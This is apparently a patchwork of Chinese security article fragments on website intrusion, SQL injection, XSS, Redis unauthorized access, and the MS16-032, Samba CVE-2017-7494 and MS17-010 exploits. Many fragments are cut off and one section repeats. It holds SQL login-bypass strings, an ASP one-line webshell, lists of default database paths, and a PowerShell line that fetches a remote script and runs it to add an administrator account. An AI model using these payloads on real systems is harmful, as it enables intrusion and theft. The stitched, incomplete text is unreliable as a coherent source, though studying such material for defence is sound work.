漏洞

随着微软发布漏洞补丁，多家媒体先后报道，但对漏洞描述与官方公开文档有一定出入。微软内部人员称：部分媒体存在选择性说明事实、夸大事实、恶意揣测和发布不负责任的虚假内容的情况。基于此，笔者想和大家客观地梳理一下此次所谓的“微软超级漏洞”。 在微软例行公布的1月补丁更新列表中，有一个漏洞引起了大家的高度关注：一个位于 CryptoAPI.dll 椭圆曲线密码 ( ECC ) 证书的验证绕过漏洞——CVE-2020-0601。 有意思的是，在微软发布公告后，美国国家安全局（NSA）也发布了关于CVE-2020-0601漏洞的预警通告。根据通告可以得知，这个漏洞是由NSA率先独立发现并汇报给微软的（微软在报告中对NSA致谢）。 漏洞介绍 该漏洞位于Windows CryptoAPI(Crypt32.dll)验证椭圆曲线加密算法证书的方式，可能影响信任的一些实例包括（不限于）：HTTPS连接、文件签名和电子邮件签名、以用户模式启动的签名可执行程序。 此外，该漏洞可以让攻击者伪造代码签名证书对恶意可执行文件进行签名，使文件看似来自可信的来源。例如，可以让勒索软件或其他间谍软件拥有看似有效的证书，从而促使用户安装。中间人攻击并解密用户连接到受影响软件的机密信息也是主要的攻击场景之一。 影响范围 目前，支持使用带有指定参数的ECC密钥的证书的Microsoft Windows版本会受到影响

首先，观察指定网站。 入侵指定网站是需要条件的： 要先观察这个网站是动态还是静态的。 首先介绍下什么样站点可以入侵：我认为必须是动态的网站 如ASP、 PHP 、 JSP等代码编写的站点 如果是静态的（.htm或html）,一般是不会成功的。 如果要入侵的目标网站是动态的，就可以利用动态网站的漏洞进行入侵。 Quote: 以下是入侵网站常用方法： 1.上传漏洞 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”，80%就有漏洞了！ 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.　 2.注入漏洞 字符过滤不严造成的 3.暴库:把二级目录中间的/换成%5c　 　 　 4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有： 　’or’’=’　\" or \"a\"=\"a　　 ’) or (’a’=’a　　 \") or (\"a\"=\"a　　or 1=1--　 ’ or ’a’=’a 5.社会工程学。这个我们都知道吧。就是猜解。 　 6.写入ASP格式 数据库 。就是一句话木马〈%execute request(\"value\")%〉 （数据库必需得是ASP或ASA的后缀） 　　 7.源码利用：一些网站用的都是网上下载的源码.有的站长很懒

漏洞排查思路： 1.上传漏洞 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”，80%就有漏洞了！ 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN、中国菜刀上传.　 2.注入漏洞 字符过滤不严造成的 3.暴库:把二级目录中间的/换成%5c　 　 4.'or'='or'这是一个可以连接SQL的语名句.可以直接进入后台。 我收集了一下。类似的还有： 　'or''=' 　" or "a"="a　　 ') or ('a'='a　　 ") or ("a"="a　　 or 1=1--　 ' or 'a'='a 5.社会工程学。这个我们都知道吧。就是猜解。 　 6.写入ASP格式数据库。就是一句话木马〈%execute request("value")%〉 （数据库必需得是ASP或ASA的后缀） 　　 7.源码利用：一些网站用的都是网上下载的源码.有的站长很懒.什么也不改. 比如：默认数据库，默认后台地址，默认管理员帐号密码等 8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL. /Databackup/dvbbs7.MDB /bbs/Databackup/dvbbs7.MDB /bbs/Data/dvbbs7.MDB /data/dvbbs7.mdb /bbs/diy

1.拿到一个待检测的站，你觉得应该先做什么？ 收集信息 whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说... 2.mysql的网站注入，5.0以上和5.0以下有什么区别？ 5.0以下没有information_schema这个系统表，无法列表名等，只能暴力跑表名。 5.0以下是多用户单操作，5.0以上是多用户多操做。 3.在渗透过程中，收集目标站注册人邮箱对我们有什么价值？ 丢社工库里看看有没有泄露密码，然后尝试用泄露的密码进行登录后台。 用邮箱做关键词进行丢进搜索引擎。 利用搜索到的关联信息找出其他邮进而得到常用社交账号。 社工找出社交账号，里面或许会找出管理员设置密码的习惯 。 利用已有信息生成专用字典。 观察管理员常逛哪些非大众性网站，拿下它，你会得到更多好东西。 4.判断出网站的CMS对渗透有什么意义？ 查找网上已曝光的程序漏洞。 如果开源，还能下载相对应的源码进行代码审计。 5.一个成熟并且相对安全的CMS，渗透时扫目录的意义？ 敏感文件、二级目录扫描 站长的误操作比如：网站备份的压缩文件、说明.txt、二级目录可能存放着其他站点 6.常见的网站服务器容器。 IIS、Apache、nginx、Lighttpd、Tomcat 7.mysql注入点，用工具对目标站直接写入一句话，需要哪些条件？

前言 今年5月，比特币勒索病毒WannaCry席卷全球，国内众多机构部门计算机系统瘫痪。根据之前应急响应的案例分析，以及一些安全报告统计，目前大部分的勒索病毒均利用未授权访问等通用漏洞进行植入、勒索，尤其是Redis、MongoDB等数据库的未授权访问漏洞尤其严重。参见 《【脉搏译文系列】如何高效的应对勒索软件》 0x01 介绍 未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷，导致其他用户可以直接访问，从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。 目前主要存在未授权访问漏洞的有：NFS服务，Samba服务，LDAP，Rsync，FTP，GitLab，Jenkins，MongoDB，Redis，ZooKeeper，ElasticSearch，Memcache，CouchDB，Docker，Solr，Hadoop，Dubbo等，本文主要介绍一些目前比较常用的一些服务的未授权访问，欢迎大家补充！ 0x02 Redis未授权访问 2.1 漏洞描述 Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据，可导致敏感信息泄露，也可以恶意执行flushall来清空所有数据。如果Redis以root身份运行，可以给root账户写入SSH公钥文件，直接通过SSH登录受害服务器。 2.2 漏洞利用 1、利用计划任务执行命令反弹shell

背景 现在的网站包含大量的动态内容以提高用户体验，比过去要复杂得多。所谓动态内容，就是根据用户环境和需要，Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”（Cross Site Scripting, 安全专家们通常将其缩写成 XSS）的威胁，而静态站点则完全不受其影响。这篇FAQ将使你能更深入地理解这种威胁，并给出如何检测并防止的建议。 简介 跨站脚本攻击（也称为XSS）指利用网站漏洞从用户那里恶意盗取信息。用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时，通常会点击其中的链接。攻击者通过在链接中插入恶意代码，就能够盗取用户信息。攻击者通常会用十六进制（或其他编码方式）将链接编码，以免用户怀疑它的合法性。网站在接收到包含恶意代码的请求之后会产成一个包含恶意代码的页面，而这个页面看起来就像是那个网站应当生成的合法页面一样。许多流行的留言本和论坛程序允许用户发表包含HTML和javascript的帖子。假设用户甲发表了一篇包含恶意脚本的帖子，那么用户乙在浏览这篇帖子时，恶意脚本就会执行，盗取用户乙的session信息。有关攻击方法的详细情况将在下面阐述。 XSS和CSS 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS，但这会与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆

exploit-db的详情： https://www.exploit-db.com/exploits/39574/ Windows: Secondary Logon Standard Handles Missing Sanitization EoP Platform: Windows 8.1, Windows 10, not testing on Windows 7 Class: Elevation of Privilege 0x01使用标准用户登陆win7,下图是当前登录用户abc的详细信息。 0x02直接执行命令进行提权，简单粗暴 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators hacker /add'" 0x03下面就是见证奇迹的时刻了 该漏洞危害十分严重，如图在2008server上测试 本地测试如图

漏洞信息: 2017年5月24日Samba发布了4.6.4版本，中间修复了一个严重的远程代码执行漏洞，漏洞编号CVE-2017-7494，漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。 漏洞利用条件: 1. 服务器打开了文件/打印机共享端口445，让其能够在公网上访问 2. 共享文件拥有写入权限 3. 恶意攻击者需猜解Samba服务端共享目录的物理路径 满足以上条件时，由于Samba能够为选定的目录创建网络共享，当恶意的客户端连接上一个可写的共享目录时，通过上传恶意的链接库文件，使服务端程序加载并执行它，从而实现远程代码执行。根据服务器的情况，攻击者还有可能以root身份执 测试环境： 在docker下搭建测试环境 1.拉取镜像到本地 root@backlion-virtual-machine:/home/backlion# docker pull medicean/vulapps:s_samba_1 2.启动环境，并将虚拟的445端口映射到物理机的445端口上： root@backlion-virtual-machine:/home/backlion# docker run -d -p 445:445 -p 139:139 -p 138:138 -p 137:137 medicean/vulapps:s_samba_1 3

ms17-010漏洞利用 漏洞描述 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞，该漏洞导致攻击者在目标系统上可以执行任意代码。 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞，恶意代码会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 实验环境 主机：kali IP：192.168.220.128 靶机：windows7 IP：192.168.220.130 漏洞利用 查看靶机能否ping通 进入matesploit 搜索ms17-010 使用攻击模块 设置攻击载荷payload 查看需要配置的参数 Required项是yes的都是需要配置的 RHOST是靶机IP，RHOSTS表示可以输入多个IP地址 LHOST是主机IP LPORT是主机的攻击端口 设置相关参数 开始攻击exploit 攻击成功，meterpreter有很多命令，输入help查看 用户操作：Stdapi: User interface Commands（用户接口命令） enumdesktops -- > 列出所有可访问的桌面和窗口站（窗体列表） getdesktop -- > 得到当前的Meterpreter桌面

引言 开源对软件的发展可以说具有深远的意义，它帮助我们共享成果，重复使用其他人开发的软件库，让我们能够专注于我们自己的创新，它推进了技术的快速发展。据不完全统计78% 的企业都在使用开源，但是其中有多少企业关注第三方开园依赖的安全呢？其中仅有13% 将安全作为第一考虑因素。可喜的是仍然有50% 的企业将安全列为第二或第三位考虑因素，越来越多的公司开始重视第三方依赖的安全性。 为什么要关住第三方依赖的安全性 想象我们交付的软件 Application 是一张饼，我们自己开发的代码仅占其中很小一部分，见下图： 而开源依赖并不等于是安全的，当然也不等于不安全，自2000年，仅有几家大厂贡献开源，其中有Apache, Linux, IBM, OpenSSL等，而到了2015年之后，任何人都在贡献开源社区，下图是主流软件库的发展 ，数量庞大 而我们在使用这些依赖的时候，一定要意识到： 开源依赖往往很少有进行安全性测试的 开源软件开发人源对安全意识普遍不高 开源软件提供方没有多余的预算进行安全性测试 ***的主要***目标是开源，因为***一个，影响范围很大 让我们一起看几组第三方依赖安全的调查数据： 如何管理第三方依赖安全 我们看到第三方依赖是存在非常大的安全隐患的，那我们应该如何做呢？不使用第三方依赖显然是不现实的，我们总结了四个步骤 了解你都使用了哪些依赖 删除你不需要的依赖